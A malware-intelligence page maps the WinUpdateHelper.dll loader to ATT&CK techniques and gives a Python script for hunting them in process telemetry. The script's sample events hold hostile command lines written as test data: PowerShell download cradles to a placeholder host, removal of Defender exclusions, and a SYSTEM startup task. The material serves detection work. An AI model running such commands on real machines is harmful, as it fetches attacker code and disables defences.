Mallory

Malware
WinUpdateHelper.dll

MITRE ATT&CK

Techniques & procedures

7 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

3 techniques

T1053.005 Scheduled Task/Job: Scheduled Task (1 evidence item)

Evidence: "... This creates a scheduled task running as SYSTEM at startup"

T1059.001 Command and Scripting Interpreter: PowerShell (1 evidence item)

Evidence: "... Launches two parallel PowerShell download cradles using the DGA domain"

T1204.002 User Execution: Malicious File (1 evidence item)

Evidence: "... The infection begins with a social engineering lure ... directing victims to getthishusd[.]live ... When the gate validates the parameters, it issues an HTTP 302 redirect ... dynamically generates a 9.4 MB ZIP archive"

Persistence

1 technique

T1053.005 Scheduled Task/Job: Scheduled Task (1 evidence item)

Evidence (same excerpt as under Execution): "... This creates a scheduled task running as SYSTEM at startup"

Privilege Escalation

1 technique

T1053.005 Scheduled Task/Job: Scheduled Task (1 evidence item)

Evidence (same excerpt as under Execution): "... This creates a scheduled task running as SYSTEM at startup"

Defense Evasion

2 techniques

T1036.005 Masquerading: Match Legitimate Resource Name or Location (1 evidence item)

Evidence: "... The DLL is a trojanized component of the legitimate BCUninstaller ... retains the original metadata"

Because the version-info metadata is carried over from the genuine component, file-description and product-name checks will not separate the trojanized DLL from the original; compare the file hash or the Authenticode signature against the vendor's release instead.

T1562.001 Impair Defenses: Disable or Modify Tools (1 evidence item)

Evidence: "... This first strips all existing Defender exclusions, then adds five attacker-controlled exclusion paths"

Defender records each exclusion change as event 5007 (configuration changed) in its operational log; a removal of every existing exclusion followed immediately by several additions is itself a strong signal, independent of the paths chosen.

Command and Control

2 techniques

T1071.001 Application Layer Protocol: Web Protocols (1 evidence item)

Evidence: "... HTTP-based C2 communication"

T1568.002 Dynamic Resolution: Domain Generation Algorithms (1 evidence item)

Evidence: "... the DGA formula computes the active C2 domain using nothing more than the current Unix timestamp"

Since the only input is the current time, anyone holding the formula can precompute upcoming domains for blocking or sinkholing; when doing so, generate the neighbouring time windows as well, because clock skew on infected hosts shifts which domain they resolve.
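The three host-side behaviours documented above, the SYSTEM startup task (T1053.005), the parallel PowerShell download cradles (T1059.001) and the Defender exclusion purge-and-add (T1562.001), can be hunted together in process-creation telemetry. The following is an added example, not Mallory's code and not the malware's own command lines: every event, host name, domain and command-line pattern in it (schtasks /ru SYSTEM /sc onstart, the PowerShell download verbs, Remove-/Add-MpPreference) is an assumption, since the page does not publish the family's actual commands.

```python
"""Hunt for WinUpdateHelper.dll host behaviours in process-creation telemetry.

Covers the three techniques the page attributes to the loader:
  T1053.005  scheduled task running as SYSTEM at startup
  T1059.001  parallel PowerShell download cradles
  T1562.001  Defender exclusions stripped, then attacker paths added
Events, hosts, domain and command-line patterns are constructed/assumed;
the page does not publish the family's actual command lines.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ts: int        # Unix timestamp of process creation (Sysmon EID 1 / 4688)
    host: str
    parent: str    # parent image file name
    image: str     # image file name
    cmdline: str


# Constructed sample telemetry (not taken from the page). ws01 mimics the
# described chain under rundll32.exe; ws02 is benign admin activity.
SAMPLE_EVENTS = [
    ProcEvent(1718000000, "ws01", "rundll32.exe", "schtasks.exe",
              'schtasks /create /tn "WinUpdateHelper" /tr "rundll32.exe '
              'C:\\ProgramData\\WinUpdateHelper.dll,Start" /sc onstart /ru SYSTEM /f'),
    ProcEvent(1718000001, "ws01", "rundll32.exe", "powershell.exe",
              'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient)'
              '.DownloadString(\'http://a1b2c3.example/p1\')"'),   # placeholder domain
    ProcEvent(1718000001, "ws01", "rundll32.exe", "powershell.exe",
              'powershell -nop -w hidden -c "Invoke-WebRequest '
              'http://a1b2c3.example/p2 -OutFile $env:TEMP\\u.exe"'),
    ProcEvent(1718000002, "ws01", "rundll32.exe", "powershell.exe",
              'powershell -c "Get-MpPreference | Select -Expand ExclusionPath | '
              '% { Remove-MpPreference -ExclusionPath $_ }; Add-MpPreference '
              '-ExclusionPath C:\\ProgramData,C:\\Users\\Public,C:\\Windows\\Temp,'
              'C:\\Temp,C:\\Tools"'),
    ProcEvent(1718000500, "ws02", "explorer.exe", "schtasks.exe",
              'schtasks /create /tn "Backup" /tr "C:\\Tools\\backup.exe" /sc daily /st 02:00'),
    ProcEvent(1718000600, "ws02", "explorer.exe", "powershell.exe",
              'powershell -c "Get-Process | Sort CPU -desc | Select -First 5"'),
]

# Assumed command-line patterns; tune them to your own telemetry.
RUN_AS_SYSTEM = re.compile(r'/ru\s+"?(nt authority\\)?system"?', re.I)
ON_START = re.compile(r"/sc\s+onstart", re.I)
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
                    r"Invoke-RestMethod|\birm\b|Start-BitsTransfer", re.I)
EXCL_REMOVE = re.compile(r"Remove-MpPreference\s+-ExclusionPath", re.I)
EXCL_ADD = re.compile(r'Add-MpPreference\s+-ExclusionPath\s+([^;"]+)', re.I)
PS_IMAGES = {"powershell.exe", "pwsh.exe"}


def count_added_exclusions(cmdline: str) -> int:
    """Number of paths handed to Add-MpPreference -ExclusionPath (comma list)."""
    m = EXCL_ADD.search(cmdline)
    return len([p for p in m.group(1).split(",") if p.strip()]) if m else 0


def hunt(events):
    """Return (host, technique, ts, detail) for every event that matches a rule."""
    hits = []
    for e in events:
        img = e.image.lower()
        if img == "schtasks.exe" and RUN_AS_SYSTEM.search(e.cmdline) and ON_START.search(e.cmdline):
            hits.append((e.host, "T1053.005", e.ts, "scheduled task as SYSTEM at startup"))
        if img in PS_IMAGES:
            if CRADLE.search(e.cmdline):
                hits.append((e.host, "T1059.001", e.ts, f"download cradle under {e.parent}"))
            if EXCL_REMOVE.search(e.cmdline):
                hits.append((e.host, "T1562.001", e.ts, "Defender exclusions removed"))
            n = count_added_exclusions(e.cmdline)
            if n:
                hits.append((e.host, "T1562.001", e.ts, f"{n} Defender exclusion path(s) added"))
    return hits


def correlate(hits, window=60):
    """Hosts on which two or more distinct techniques fire within `window` seconds.
    A lone cradle or a lone task is noisy; the chain together is not."""
    by_host = defaultdict(list)
    for host, tech, ts, _ in hits:
        by_host[host].append((ts, tech))
    flagged = {}
    for host, items in by_host.items():
        items.sort()
        for t0, _ in items:
            techs = {tech for ts, tech in items if t0 <= ts <= t0 + window}
            if len(techs) >= 2:
                flagged[host] = techs
                break
    return flagged


if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for h in found:
        print(h)
    print("flagged:", correlate(found))
```

Run against real Sysmon or 4688 exports by mapping each record onto ProcEvent; the per-rule hits are deliberately broad, and the correlation step is what turns them into a page-worthy alert, so widen the window rather than the regexes if the chain is spread out on your hosts.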
